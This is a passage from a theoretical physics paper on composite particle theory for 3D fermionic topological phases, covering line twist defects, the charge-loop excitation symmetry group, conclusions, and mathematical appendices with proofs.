$qp_1$ which moves around the defect once. As a result, anyon $qp_1$ is changed to anyon $\mathscr{G}qp_1$ that is finally absorbed by the defect. Such a process occurs inside the defect-anyon composite and cannot change the defect species [@Teo2014]. Therefore, the process provides an equivalence between two defect-anyon composites. A typical example in (2+1)D is $K=2\sigma_x$ Chern-Simons theory that describes $\Z_2$ topological order. Its anyonic symmetry group is given by $\{\mathbb{I},\sigma_x\}$. The nontrivial group element $\sigma_x$ interchanges the anyon $e$, labeled by the quasiparticle vector $(1 \text{ mod }2,0\text{ mod }2)^T$, and the anyon $m$, labeled by the quasiparticle vector $(0\text{ mod }2,1\text{ mod }2)^T$. A defect labeled by this group element can in principle be realized by externally imposing a dislocation in the Wen-plaquette model as mentioned previously. For convenience, the identity quasiparticle (vacuum) $vac$ is labeled by $(0\text{ mod }2,0\text{ mod }2)^T,$ and the fermion quasiparticle $\psi$ is labeled by $(1\text{ mod }2,1\text{ mod }2)^T$. Thus, the only non-trivial, bare defect is given by $\mathcal{D}^0_{\sigma_x}$. Next we need to deduce equivalence classes of defect-anyon composites. Taking into account Eq. (\[equation\_fusion\_2d\]) and $\mathbb{I}-\sigma_x=\left(\begin{smallmatrix}1&-1\\-1&1\end{smallmatrix}\right)$, we have: $$\begin{aligned} &\mathcal{D}^0_{\sigma_x}\times qp=\mathcal{D}^0_{\sigma_x}\times (qp+\epsilon)\,, \forall qp\in\{vac,e,m,\epsilon\}.\nonumber \end{aligned}$$ Here, the symbol “$+$” denotes the usual addition of quasiparticle vectors of $qp$ and $\epsilon$. Therefore, there are two equivalence classes: $\mathcal{D}^0_{\sigma_x}\times e=\mathcal{D}^0_{\sigma_x}\times m$ and $\mathcal{D}^0_{\sigma_x}\times \psi=\mathcal{D}^0_{\sigma_x}$. In other words, there are two topologically distinct defects: one is bare, given by a bare defect $\mathcal{D}^0_{\sigma_x}$; the other one is a defect-anyon composite, denoted by $\mathcal{D}^1_{\sigma_x}=\mathcal{D}^0_{\sigma_x}\times e$. The fusion rules of these two defects are given by: $$\begin{aligned} \mathcal{D}^0_{\sigma_x}\times\mathcal{D}^0_{\sigma_x}=\mathcal{D}^1_{\sigma_x}\times\mathcal{D}^1_{\sigma_x}=vac+\psi, \mathcal{D}^0_{\sigma_x}\times\mathcal{D}^1_{\sigma_x}=e+m\,,\nonumber\end{aligned}$$ where “$+$” here denotes the collection of different fusion channels into quasiparticles of simple-type. Now that we have reviewed the lower dimensional case, let us move on to 3D. Simply from a dimensionality point of view, there are two types of extrinsic defects in 3D: line defects and point defects. The latter also appear in 2D and serve as end points on which 1D branch cuts (i.e., the dashed line in Fig. \[figure\_defect\](b)) terminate. The former are really loop-like. In Fig. \[figure\_defect\](a), the line defect is drawn as a finite line that ends at the top and bottom boundaries where a periodic boundary condition is implicitly imposed. A 2D branch “brane” (i.e., the shaded plane in Fig. \[figure\_defect\](a)) is attached to each line defect. From Fig. \[figure\_defect\], we see that line defects can perform generic $\mathsf{Charles}$ operations where both point particles and loops are transformed. In contrast, point defects can only perform $\mathsf{Charles}$ operations on loops, meaning that $\mathscr{G}=W\oplus \Omega=\mathbb{I}\oplus \Omega$ for point defects. However, due to Eq. (\[eqn:auto\]), the only candidate for $\Omega$ is $\mathbb{I}$. This means that point defects can only behave like the identity element $\mathscr{G}_{\mathbb{I}}=\mathbb{I}\oplus\mathbb{I}$ of $\mathsf{Charles}$. Therefore, in 3D, we only consider line defects since point defects *cannot* perform nontrivial $\mathsf{Charles}$ operations. In a manner similar to 2D, a *defect-charge-loop composite* is allowed, where the term “defect” corresponds to a line defect, “charge” corresponds to a point-like excitation, and “loop” corresponds to a loop excitation. Since loops are always transformed to loops by $\Omega,$ and particles are always transformed to particles by $W$, we may study defect-charge-composites and defect-loop-composites separately. In order to determine defect species for a given $\mathsf{Charles}$ group element $\mathscr{G}$, we need to study the equivalence classes of the above two kinds of defect composites. For defect-charge-composites, the following equation determines the equivalence classes: $$\begin{aligned} \mathcal{D}^0_{\mathscr{G}}\times qp=\mathcal{D}^0_{\mathscr{G}}\times (qp+(\mathbb{I}-W)qp_1)\,,\label{equation_fusion_3d_charge}\end{aligned}$$ which is diagrammatically shown in Fig. \[figure\_defect\_composite\](b). $qp$ denotes point-like particle excitations. $\mathcal{D}^0_{\mathscr{G}}$ denotes the bare line defect that is labeled by a $\mathsf{Charles}$ group element (or conjugacy class for a non-Abelian group) $\mathscr{G}=W\oplus \Omega$. $ qp_1$ is any particle excitation provided by the parent 3D Abelian topological phase. Eq. (\[equation\_fusion\_3d\_charge\]) means that the defect-charge composite $\mathcal{D}^0_{\mathscr{G}}\times qp$ is topologically equivalent to the defect-charge composite that is formed by the fusion between the same bare line defect and a different particle excitation given by $(qp+(\mathbb{I}-W)qp_1)$. Likewise, we have a similar equation for defect-loop composites: $$\begin{aligned} \mathcal{D}^0_{\mathscr{G}}\times loop=\mathcal{D}^0_{\mathscr{G}}\times (loop+(\mathbb{I}-\Omega)loop_1)\,,\label{equation_fusion_3d_loop}\end{aligned}$$ which is diagrammatically shown in Fig. \[figure\_defect\_composite\](c). One can also unify Eqs. (\[equation\_fusion\_3d\_charge\],\[equation\_fusion\_3d\_loop\]) by considering charge-loop composites. We will show this in the following example. Let us take $K=3$ in Table \[table:charlos\] as an example. There is only one nontrivial group element given by $\mathscr{G}=-\mathbb{I}\oplus-\mathbb{I}$. For convenience, we label the three topologically distinct particle excitations as $t_0,t_1,t_2$ and the three distinct loop excitations as $l_0,l_1,l_2$. Using numerical labels, we have: $t_0=0\text{ mod }3, t_1=1\text{ mod }3, t_2=2\text{ mod }3$, and $l_0=0\text{ mod }3, l_1=1\text{ mod }3, l_2=2\text{ mod }3$. We can consider the set of 2D vectors $\mathbf{V}_{ij}=(t_i,l_j)^T$ where $i,j=0,1,2$ and hence, there are $3^2=9$ vectors that label the 9 topologically distinct charge-loop composites: $$\begin{aligned} \!\!\!\!\{\mathbf{V}_{ij}\}\!=\!\!\bpm0 \\ 0\epm\!\!, \bpm1 \\ 0\epm\!\!, \bpm2 \\ 0\epm\!\!, \bpm0 \\1\epm\!\!, \bpm1\\1 \epm\!\!, \bpm2 \\ 1\epm\!\!, \bpm0 \\ 2\epm\!\!,\bpm1 \\ 2\epm\!\!, \bpm2\\ 2\epm.\nonumber\end{aligned}$$ As a result, Eqs. (\[equation\_fusion\_3d\_charge\],\[equation\_fusion\_3d\_loop\]) can be unified as: $$\begin{aligned} \mathcal{D}^0_{\mathscr{G}}\times \mathbf{V}=\mathcal{D}^0_{\mathscr{G}}\times (\mathbf{V}+(\mathscr{G}_{\mathbb{I}}-\mathscr{G})\mathbf{V}')\,,\label{equation_fusion_3d_unified}\end{aligned}$$ where $\mathbf{V},\mathbf{V}'\in\{\mathbf{V}_{ij}\}$. By noting that $\mathscr{G}_{\mathbb{I}}-\mathscr{G}=\left(\begin{smallmatrix}1&0\\ 0&1\end{smallmatrix}\right)-\left(\begin{smallmatrix}-1&0\\ 0&-1\end{smallmatrix}\right)=\left(\begin{smallmatrix}2&0\\ 0&2\end{smallmatrix}\right)$, the above relation reduces to: $$\begin{aligned} \mathcal{D}^0_{\mathscr{G}}\times \mathbf{V}=\mathcal{D}^0_{\mathscr{G}}\times (\mathbf{V}+2\mathbf{V}').\end{aligned}$$ As a result, all defect-charge-loop composites are topologically equivalent to the bare defect: $ \mathcal{D}^0_{\mathscr{G}}=\mathcal{D}^0_{\mathscr{G}}\times \mathbf{V}_{ij}\,,$ where $\{\mathbf{V}_{ij}\}$ denotes the 9 vectors ($i,j=0,1,2$). The resulting fusion rules are given by: $$\begin{aligned} \mathbf{V}_{ij}\times \mathbf{V}_{i'j'}&=\mathbf{V}_{(i+i')\text{mod}3,(j+j')\text{mod}3}\,,\\ \mathcal{D}^0_{\mathscr{G}}\times \mathcal{D}^0_{\mathscr{G}}&=\sum_{ij} \mathbf{V}_{ij}\,, \end{aligned}$$ from which we see that there are multiple fusion channels when two defects are fused together. It indicates that the externally imposed line defect $\mathcal{D}^0_{\mathscr{G}}$ is of non-Abelian nature. Conclusions {#sec:conclusion_direction} =========== In this work, a composite particle theory for 3D fermionic gapped phases was formulated based on a specific parton construction of electrons. Composite particles are bound states of partons and magnetic monopoles for a set of internal gauge fields and the external electromagnetic field $A_\mu$. The resulting fully-gapped phases were constructed by condensing two composite particles. All excitations including point-like and string-like excitations as a whole form a charge-loop-lattice. Each site of the charge-loop-lattice corresponds to a deconfined excitation of the condensed phase. A general mechanism for charge fractionalization in 3D was studied in detail. Based on the general framework of composite particle theory, we further explored two important properties of 3D Abelian topological phases. First, we studied phases with non-vanishing axion $\Theta$ angle which is characteristic of the tilted charge lattice. It was found that time-reversal invariant fractional topological insulators with $\Theta\neq \pi$ can be constructed from composite particle theory. Second, we generalized the notion of anyonic symmetry of 2D Abelian topological phases to a charge-loop excitation permutation symmetry ($\mathsf{Charles}$) group in 3D Abelian topological phases. We also investigated the relation between $\mathsf{Charles}$ group elements and line twist defects in (3+1)D Abelian topological phases. There are several interesting directions for future studies. *First*, it is interesting to propose a systematic theory of the symmetric surface states of fractional topological insulators based on the composite particle theory. The 2D surface may exhibit quantum phenomena that are even more exotic than the surface topological order recently found on the surface of interacting topological insulators and interacting bosonic topological insulators [@bti1; @bti2; @bti3; @bti4; @bti5; @bti7; @bti8; @sto1; @sto2; @sto3; @sto4; @sto5]. For the [FTI]{} bulk lattice model construction and the phase diagram of confinement-deconfinement, the idea in Ref.  may be helpful. *Second*, one may consider the composite particle theory by assuming that partons form topological superconductor ansätze, which may lead to interacting topological superconductors with fractional gravito-electromagnetism and a fractional version of the gravitational Witten effect [@grav1; @grav2]. *Third*, as discussed in Sec. \[sec:general\_charlos\], the tensor-network-type graphs may be helpful for understanding 3D analogs of the twist liquid, i.e., the topological phases obtained by gauging $\mathsf{Charles}$. *Fourth*, it is interesting to think if there are simple 3D lattice models that can demonstrate the physics of extrinsic defects and $\mathsf{Charles}$, in analogy to the 2D case where there are lattice models like the Wen-plaquette model. In addition, some group elements of $\mathsf{Charles}$ may break $U(1)$ charge symmetry. A line defect associated with such a group element might be realized in a $U(1)$-symmetric 3D lattice model as an extrinsic defect coated with a superconducting region. *Fifth*, in analogy to 2D anyonic symmetry where $G$-crossed tensor category theory [@Teo2015; @Barkeshli2014] was proposed, a generic mathematical framework is also needed for 3D extrinsic defects. *Sixth*, it would be useful to have a microscopic theory of 3D line twist defects in terms of a cutting and gluing procedure where the twist defects are formed by tuning/twisting allowed tunneling terms between the two sides of a gapless cut [@genon_1; @genon_2; @genon_3; @dhl_cut_glue]. Acknowledgement {#acknowledgement .unnumbered} =============== We would like to thank K. Shiozaki, Y. Qi, and S. Ryu for helpful discussions. P.Y. would like to thank Z.-Y. Weng and X.-G. Wen for beneficial collaborations and insightful discussions on parton constructions, and also acknowledges S.-T. Yau’s hospitality at the Center of Mathematical Sciences and Applications at Harvard University where the work was done in part. This work was supported in part by the NSF through grant DMR 1408713 at the University of Illinois.(P.Y. & E.F.) T.L.H. is supported by the US National Science Foundation under grant DMR 1351895-CAR. J.M. was supported by NSERC grant \#RGPIN-2014-4608, the CRC Program, CIFAR, and the University of Alberta. Summary of notations, abbreviations, and definitions {#appendix:notation} ==================================================== In this Appendix, several notations, abbreviations, definitions, and criteria are collected for the reader’s convenience. *1. Mathematical notations:* $u,v,u',v',q,q'$: a set of parameters that label the two condensed composites as shown in Table. \[table:em\]. $Q$: the net EM electric charge carried by a composite. $Q_{\rm Debye}$: the screening charge cloud around a composite. It is induced by the two composite condensates $\varphi_1$ and $\varphi_2$. $N_A$: the bare EM electric charge carried by a composite. It is related to $Q$ via Eqs. (\[NE1\],\[NE\_screen\]). $M$: the EM magnetic charge carried by a composite. $M_\mu$: the 4-current of EM magnetic monopoles, introduced in Sec. \[sec\_FTI\_Coulomb\]. $N_{a,b}$: gauge charges in $U(1)_a$ and $U(1)_b$ gauge groups. An integer vector $\mathbf{N}_e$ is formed via Eq. (\[define\_KNq\]). $N_m^{a,b}$: magnetic charges in $U(1)_a$ and $U(1)_b$ gauge groups. An integer vector $\mathbf{N}_m$ is formed via Eq. (\[define\_KNq1\]). $\Gamma$: self-statistics of a composite. $\Gamma$ is even (odd) if the composite is bosonic (fermionic), see Eq. (\[eq:stat123\]). $\theta$: $\theta=0$ if all partons ($f^1,f^2,f^3$) form trivial band insulators. $\theta=\pi$ if all partons form topological insulators. $\vartheta^{cl}$: the mutual statistics between a point-like particle excitation and a loop excitation, see Eq. (\[eq:cltheta\]). $\Theta$: the axion angle of the electron states (i.e., the resulting fermionic gapped phase constructed via the composite particle theory). $g_{a,b}$ dimensionless gauge coupling constants of $U(1)_{a,b}$ gauge groups. $\mathcal{D}^0_\mathscr{G}$: a bare line defect associated with $\mathsf{Charles}$ group element $\mathscr{G}$. *2. Abbreviation:* $\mathsf{Charles}$: **char**ge-**l**oop **e**xcitation **s**ymmetry. EM: electromagnetic (specific to the usual background electromagnetic field $A_\mu$). FQH: fractional quantum Hall effect. [FTI]{}: fractional topological insulator. $\mathsf{GCD}$: greatest common divisor. GSD: ground state degeneracy. IQH: integer quantum Hall effect. SET: symmetry-enriched topological phase. SPT: symmetry-protected topological phase. TI: free-fermion topological insulator. TO: topological order TQFT: topological quantum field theory. *3. Definitions:* Loop-lattice: Definition \[dfn\_loops\] on Page . Excitation and charge lattice: Definition \[dfn\_excitation\] on Page . Intrinsic excitation and intrinsic charge lattice: Definition \[dfn\_intrinsic\_exc\] on Page . Charge-loop-lattice: Definition \[dfn\_cloop\] on Page . Charge-loop excitation symmetry: Definition \[dfn\_charlos\] on Page . *4. Others* Criterion \[crt\_loop\_exc\] for loop excitations on Page Criterion \[crt\_charge\_1\] for charge fractionalization on Page Criterion \[crt\_charge\_2\] for charge fractionalization on Page Technical details in Sec. \[sec:gauge\_strc\] ============================================= Details of Eq. (\[constr\_3\]) {#appendix_bosonic} ------------------------------ By inserting the data of $\varphi_1$ and $\varphi_2$ in Table \[table:em\] into Eq. (\[eq:quantum\_stat\]), one may obtain: $$\begin{aligned} \Gamma(\varphi_1) = 3q-\frac{\theta}{2\pi}[u(u+1)+v(v+1)+(u+v)(u+v-1)]\,,\end{aligned}$$ and $$\begin{aligned} \Gamma(\varphi_1) =3q'-\frac{\theta}{2\pi}[u'(u'+1)+v'(v'+1)+(u'+v')(u'+v'-1)]. \end{aligned}$$ Proof of Theorem \[theorem\_flux\] {#appendix_proof_theorem_flux} ---------------------------------- We present Bézout’s lemma as a preliminary: Bézout’s lemma [@bezout79] : Let $a$ and $b$ be nonzero integers and let $d$ be their greatest common divisor ($\mathsf{GCD}$). Then there exist integers $x$ and $y$ such that $ax+by=d$. In addition, $d$ is the smallest positive integer that can be written as $ax + by$; every integer of the form $ax + by$ is a multiple of $d$. Let us now prove Theorem 1. [Sufficiency:]{} When $|uv'-u'v|=1$, according to Eq. (\[eq:ineq\]), we straightforwardly obtain $|\mathsf{GCD}(u,u')|=1,|\mathsf{GCD}(v,v')|=1$. Then, the equalities in Eq. (\[eq:ineq\]) hold. Therefore, $(\Phi^a_e)_{\rm min}=2\pi, (\Phi^b_e)_{\rm min}=2\pi$ in Eq. (\[discreteflux1\]). [Necessity:]{} We start with the equalities in Eq. (\[eq:ineq\]), i.e., $|uv'-u'v|=|\mathsf{GCD}(u,u')|=|\mathsf{GCD}(v,v')|$. If $|uv'-u'v|\neq1$, meaning that $|\mathsf{GCD}(u,u')|=|\mathsf{GCD}(v,v')|\neq 1$. Therefore, $u,u'$ are not co-prime; $v,v'$ are not co-prime. Then, we consider: $$\begin{aligned} 1=\bigg|\frac{u}{\mathsf{GCD}(u,u')}v'-\frac{u'}{\mathsf{GCD}(u,u')}v\bigg|\,,\label{in1}\end{aligned}$$ where $\frac{u}{\mathsf{GCD}(u,u')}, \frac{u'}{\mathsf{GCD}(u,u')}$ are co-prime by definition, i.e., $$\begin{aligned} \bigg|\mathsf{GCD}(\frac{u}{\mathsf{GCD}(u,u')}, \frac{u'}{\mathsf{GCD}(u,u')})\bigg|=1\,.\nonumber \end{aligned}$$ Then, according to Eq. (\[eq:ineq\]), we can also have the following inequalities if we just replace $u$ and $u'$ in Eq. (\[eq:ineq\]) by $\frac{u}{\mathsf{GCD}(u,u')}$ and $\frac{u'}{\mathsf{GCD}(u,u')}$, respectively: $$\begin{aligned} \bigg|\frac{u}{\mathsf{GCD}(u,u')}v'-\frac{u'}{\mathsf{GCD}(u,u')}v\bigg|\geq |\mathsf{GCD}(v,v')|\,.\label{in2}\end{aligned}$$ Due to Eqs. (\[in1\],\[in2\]), we obtain $|\mathsf{GCD}(v,v')|=1$. This is contradictory to our starting point $|\mathsf{GCD}(v,v')|\neq 1$. Therefore, the only possibility is $|uv'-u'v|=|\mathsf{Det}K|=1$. Equivalence between Criterion \[crt\_charge\_1\] and Criterion \[crt\_charge\_2\] {#appendix_dirac} --------------------------------------------------------------------------------- Consider two excitations in a $U(1)_{\rm EM}$-symmetric system. Let one carry zero EM magnetic charge $M=0$ and minimal non-vanishing EM electric charge $Q=\frac{1}{w}$ with $w\in\Z$. Let the other excitation carry a minimal nonzero EM magnetic charge $w'$ and an EM electric charge, say, $y$. $y$ can be either integer or non-integer. Due to the Dirac-Zwanziger-Schwinger quantization condition [@dirac1; @dirac2; @dirac2.5; @dirac3; @dirac3.5], the magnetic and electric charges of the above two excitations satisfy: $$\begin{aligned} \left(\frac{1}{w}\times w'-0\times y\right)=0,\pm1,\pm2,\cdots\,.\end{aligned}$$ Therefore, the minimal choice of $w'$ is $w'=w$, indicating that the change of quantization of the EM magnetic charge $M$ is accompanied with a change of the charge quantization. Once $w>1$, $w'$ is also larger than one. In this sense, the two criteria are equivalent. Debye-H[ü]{}ckel charge cloud $Q_{\rm Debye}$ is the unique source of charge fractionalization {#appendix_na_integer} ---------------------------------------------------------------------------------------------- In this Appendix, we prove that the Debye-H[ü]{}ckel charge cloud $Q_{\rm Debye}$ defined in Eq. (\[NE\_screen\]) is the *unique* source of charge fractionalization. In other words, $N_A$ is always integer-valued when $M=0$. By definition in Eqs. (\[eqn:transition\_matrix\],\[eqn:transition\_matrix1\],\[Nnf1\]), $N_A$ is given by: $$\begin{aligned} N_A=&N^{f1}+N^{f2}-N^{f3}\nonumber\\ =&(n^{f1}+n^{f2}-n^{f3})+\frac{3\theta }{2\pi}M-\frac{2\theta}{2\pi}N^b_m\,,\end{aligned}$$ where $n^{fi}$ are integer-valued. $N^b_m$ is integer-valued, and $\theta=0,\pi$. Therefore, $-\frac{2\theta}{2\pi}N^b_m$ is always integer-valued. As a result, $N_A$ is integer-valued when $M=0$. Technical details in Sec. \[sec:theta\] ======================================= Partons occupying trivial bands {#appendix_Gamma_trivial_1} ------------------------------- We assume that all partons $f^{i}$ (pure gauge charge carriers) form three trivial band insulators ($\theta=0$). According to Eqs. (\[constr\_1plus\],\[constr\_1\],\[constr\_3\]), we have: $$\begin{aligned} u,v,u',v'\in\Z\,;~~q,q'\in\Z_{\rm even} \,.\label{theta_0_q_even} \end{aligned}$$ Since $\theta=0$, we have: $$\begin{aligned} N^{fi}=n^{fi}\in\Z \end{aligned}$$ according to Eq. (\[Nnf1\]). Due to the definitions in Sec. \[sec:gauge\_strc\], we end up with: $$\begin{aligned} N_a,N_b\in\Z\,. \end{aligned}$$ Thus, in the mean-field ansätze with $\theta=0$, all magnetic charges and electric charges of composites are integer-valued. However, $Q_{\rm Debye}$ and $Q$ may be fractional, depending on the condensate parameters. According to Definition \[dfn\_excitation\], excitations are a subset of generic composites and satisfy the two equations in Eq. (\[excitation\_1\]). Thus, only a 4D sublattice embedded in the 6D lattice survives, i.e., the charge lattice in Definition \[dfn\_excitation\]. Since $N_a(=N^{f1}-N^{f2})$ and $N_b(=N^{f3}-N^{f2})$ are fully determined by $M$ via Eq. (\[NabM\]), we may use the labels $(N^{f2},M,N^a_m,N_m^b).$ These four linearly independent integer numbers are “4D coordinates” of the 4D lattice that label excitations. Then, the bare EM electric charge $N_A$ is expressed as: $$\begin{aligned} N_A=N^{f1}+N^{f2}-N^{f3}=(r-s)M+N^{f2}\,.\end{aligned}$$ The net EM electric charge $Q$ is given by: $$\begin{aligned} Q=&N_A-Q_{\rm Debye}\nonumber\\ =&N^{f1}+N^{f2}-N^{f3}-Q_{\rm Debye}\nonumber\\ =&(r-s)M + N^{f2}-rN_m^a-sN_m^b\,,\label{q_trivial}\end{aligned}$$ where $N^{f1}-N^{f2}=rM$, $N^{f3}-N^{f2}=sM$ with $r$ and $s$: $$\begin{aligned} r=\frac{qv'-q'v}{\mathsf{Det}K}\,,~s=\frac{q'u-qu'}{\mathsf{Det}K}\,. \end{aligned}$$ We note that $r$ and $s$ can be either integer or non-integral rational numbers. However, $rM$ and $sM$ must be integer-valued in order to ensure the $N^{fi}$ are integer-valued. Thus, the quantization of $M$ should be altered properly if $r$ and $s$ are non-integral rational numbers. In summary, we can define the following domains: $$\begin{aligned} N^{f2}\in\Z,N^a_m\in\Z,N^b_m\in\Z\,, \frac{M}{w}\in\Z\,,\end{aligned}$$ where $w$ is a positive minimal integer such that both $rM\in\Z$ and $sM\in\Z$ are satisfied. In Eq. (\[q\_trivial\]), the $M$-dependent charge $(r-s)M$ is integer-valued: $$\begin{aligned} (r-s)M\in\Z\,.\label{theta_trivial_response} \end{aligned}$$ Therefore, the minimal quantized value of $Q$ is sufficiently determined by $rN_m^a$ and $sN^b_m$ by noting that the latter two terms can be potentially fractionalized depending on $r$ and $s$. In the language of the EM response theory, $M$-dependent charge means that the EM magnetic current minimally couples to the EM gauge field $A_\mu$. In other words, the bulk supports an EM response action with $\Theta$ term. If we define $\frac{\Theta}{2\pi}M=(r-s)M$, then $Q=\frac{\Theta}{2\pi}M+N^{f2}-rN_m^a-sN^b_m$ with $\Theta=2\pi(r-s)$. However, due to Eq. (\[theta\_trivial\_response\]), this nonzero $\Theta$ gives rise to an integer charge cloud surrounding EM magnetic monopoles. This additional charge cloud does not render a new quantization of $Q$ different from the quantization when $M=0$. In other words, the EM charge lattice ($M-Q$ plane) is just a square lattice that is not tilted. The allowed values of $Q$ when $M=0$ are completely the same as when $M\neq 0$. In this sense, the resulting state with $\Theta=2\pi(r-s)$ is equivalent to a trivial state with $\Theta=0$. By comparison, a typical example with nontrivial $\Theta$ angle has a $Q$ quantization shown in Eqs. (\[Q\_fractional\_M0\],\[Q\_fractional\_M1\]) of Sec. \[sec\_FTI\] where the quantization of $Q$ manifestly depends on $M$. Derivation of Eqs. (\[Q\_fractional\_M0\],\[Q\_fractional\_M1\]), Eq. (\[eq:stat4321\_new\]), and the site distribution in Fig. \[figure\_theta\](c) {#appendix_gamma_stat4321_new} ---------------------------------------------------------------------------------------------------------------------------------------------------- Since $M$ is quantized in multiples of $3$ as indicated in Eq. (\[double\_m\_charge\]), one may introduce an integer $k$ such that $M=3k$. Meanwhile, Eq. (\[Q\_expression\]) indicates that $Q$ is generically quantized in multiples of $1/6$. Thus, we can introduce an integer $k_0$ such that $Q=\frac{k_0}{6}$. Then, Eq. (\[Q\_expression\]) is formulated as: $$\begin{aligned} k_0+5k=2(7n^{f1}-n^{f2}-3n^{f3})\,,\end{aligned}$$ where the r.h.s. is always even. $5k$ has the same even-odd property as $k$. As a result, $k_0$ and $k$ must be simultaneously either odd or even, which leads to Eqs. (\[Q\_fractional\_M0\],\[Q\_fractional\_M1\]). Then, we start with $\Gamma$ in Eq. (\[eq:stat4321\]) and derive its equivalent expression (\[eq:stat4321\_new\]). Due to Eqs. (\[double\_m\_charge\],\[Q\_fractional\_M1\]), we introduce four integer numbers $k_0,k_1,k_2,k_3$ via $$\begin{aligned} M=3k\,, \,N_m^a=2k_1\,, \,N_m^b=2k_2\,, \,Q=\frac{k_0}{6} \end{aligned}$$ so as to simplify the analysis below. Then, solving Eqs. (\[equation\_NMA\],\[equation\_NMB\],\[Q\_expression\]) leads to: $$\begin{aligned} &n^{f1}=-\frac{5}{2}k+\frac{k_0}{6}+\frac{5}{3}k_1-\frac{2}{3}k_2\,,\\ &n^{f2}=-\frac{13}{2}k+\frac{k_0}{6}+\frac{11}{3}k_1+\frac{1}{3}k_2\,,\\ &n^{f3}=-\frac{9}{2}k+\frac{k_0}{6}+\frac{8}{3}k_1-\frac{5}{3}k_2\,. \end{aligned}$$ Therefore, $\Gamma$ in Eq. (\[eq:stat4321\_new\]) can be reformulated as: $$\begin{aligned} \Gamma=(M+1)(-14k+\frac{1}{2}k+\frac{k_0}{2}+8k_1-2k_2)\,.\end{aligned}$$ Since $(M+1)(-14k+8k_1-2k_2)$ is always an even integer, we may remove it and end up with: $$\begin{aligned} \Gamma=&(M+1)(\frac{1}{2}k+\frac{k_0}{2})\, =3(M+1)(Q+\frac{1}{18}M)\end{aligned}$$ which can be rewritten as: $$\begin{aligned} \Gamma=&3(M+1)(Q-\frac{\Theta}{2\pi}M)\end{aligned}$$ with $\Theta=-\frac{1}{9}\pi$. One can check that $\Gamma$ is invariant under the shift $\Theta\rightarrow \Theta+\frac{2}{9}\pi$ since the additional term $-3(M+1)\frac{1}{9}M=-k(3k+1)$ is always an even integer which leaves the even / odd property of $\Gamma$ unaltered. From this point of view, we say that two $\Theta$’s are topologically equivalent if their difference is given by multiples of $\frac{2}{9}\pi$. In conclusion, $$\begin{aligned} \Theta=\frac{1}{9}\pi \text{ mod }\frac{2}{9}\pi\,.\end{aligned}$$ As a result, $-\frac{1}{9}\pi$, $\frac{1}{9}\pi$, $-\frac{5}{9}\pi$, etc. describe the same [FTI]{} states. The periodicity $\frac{2}{9}\pi$ is the minimal one in the sense that any shift smaller than $\frac{2}{9}\pi$ does not keep the even-odd property of $\Gamma$ invariant. In other words, the charge lattice with “tilt angle” $\Theta=\frac{1}{9}\pi$ is always different from a lattice with $\Theta=0$. This periodicity check is very important since it is possible that a nonzero $\Theta$ might be entirely removed by a periodic shift. If this happens, the resulting bulk state is actually a trivial state. Next, we calculate the lattice sites in Fig. \[figure\_theta\](b). Since $Q=\frac{1}{6}$ and $M=3$, we have: $k_0=1,k=1$: $$\begin{aligned} &n^{f1}=(-2+2k_1-k_2)+\frac{-1-k_1+k_2}{3}\,,\\ &n^{f2}=(-6+4k_1)+\frac{-1-k_1+k_2}{3}\,,\\ &n^{f3}=(-4+3k_1-2k_2)+\frac{-1-k_1+k_2}{3}\,. \end{aligned}$$ Therefore, $-1-k_1+k_2$ should be quantized in multiples of 3 such that the $n^{fi}$’s are integer-valued. By noting that $N^a_m=2k_1,N^b_m=2k_2$, we end up with Fig. \[figure\_theta\](c) where $k_0=1,k=0$ are assumed. Technical details in Sec. \[sec:charlos\_defect\_symmetry\] {#appendix_proof_group} =========================================================== $\mathsf{Charles}$ is a group ----------------------------- is to prove that $\mathsf{Auto}(K)$ is a group. In other words, the elements satisfy the four group axioms. (identity element, inverse element, closure, associativity). Identity element.— The identity element is $\mathscr{G}_{\mathbb{I}}=W\oplus \Omega=\mathbb{I}\oplus\mathbb{I}$ where $\mathbb{I}$ is a rank-2 identity matrix. For every element $\mathscr{G}$ in $\mathsf{Auto}(K)$, the equation $\mathscr{G}\cdot \mathscr{G}_{\mathbb{I}}=\mathscr{G}_{\mathbb{I}} \cdot\mathscr{G}=\mathscr{G} $ holds. Here the symbol $\cdot$ denotes matrix multiplication. We will also omit it unless otherwise specified. Associativity.— Associativity is guaranteed by matrix multiplication rules. Inverse element.— The inverse element of $\mathscr{G}$ is given by: $\mathscr{G}^{-1}=W^{-1}\oplus \Omega^{-1}$. One may check that $(W^{-1}\oplus \Omega^{-1})\cdot (W\oplus \Omega)=\mathbb{I}\oplus\mathbb{I}=\mathscr{G}_{\mathbb{I}}$ and $ (W\oplus \Omega)\cdot (W^{-1}\oplus \Omega^{-1})=\mathscr{G}_{\mathbb{I}}$, which means that: $\mathscr{G}^{-1}\cdot\mathscr{G}=\mathscr{G}\cdot\mathscr{G}^{-1}=\mathscr{G}_{\mathbb{I}}$. Closure.— Suppose $\mathscr{G}'=W'\oplus \Omega'\in \mathsf{Auto}(K)$. Thus, $W,\Omega, W',\Omega'$ matrices satisfy conditions (i) and (ii) in Definition \[dfn\_charlos\]. Then, by definition, $\mathscr{G}'\cdot \mathscr{G}=(W' W)\oplus (\Omega' \Omega)$. Both $W' W$ and $\Omega' \Omega$ are still rank-2 unimodular matrices. Furthermore, $$\begin{aligned} (\Omega'\Omega)K (W' W)^T= \Omega'(\Omega K W^T) {W'}^T= \Omega'K{W'}^T=K\,.\nonumber\end{aligned}$$ $\therefore$ condition (i) is satisfied. And, $$\begin{aligned} &\Gamma (\cdots,(W'W)^{-1}\mathbf{N}_m,\cdots)\nonumber\\ =&\Gamma (\cdots,W^{-1}{W'}^{-1}\mathbf{N}_m,\cdots)\nonumber\\ =&\Gamma (\cdots,{W'}^{-1}\mathbf{N}_m,\cdots)\nonumber\\ =&\Gamma (\cdots,\mathbf{N}_m,\cdots)\,.\nonumber \end{aligned}$$ $\therefore$ condition (ii) is also satisfied. is to verify that $\mathsf{Inner}(K)$ is a subgroup of $\mathsf{Auto}(K)$. First, it is a subset of $\mathsf{Auto}(K)$, i.e., $\mathsf{Inner}(K)\subset\mathsf{Auto}(K)$ since not only do $W$ and $\Omega$ satisfy condition (i) and (ii), but also satisfy $$\begin{aligned} W^{-1}\mathbf{N}_m-\mathbf{N}_m=K^T\,(n_1,n_2)^T\end{aligned}$$ and $$\begin{aligned} \Omega^{-1}\mathbf{L}-\mathbf{L}=K(n_3,n_4)^T\,.\end{aligned}$$ Here $n_1,\cdots,n_4$ are integers. $n_1,n_2$ depend on $\mathbf{N}_m,W$; $n_3,n_4$ depend on $\mathbf{L},\Omega$. $\mathscr{G}_{\mathbb{I}}\in \mathsf{Inner}(K)$ since one can obtain 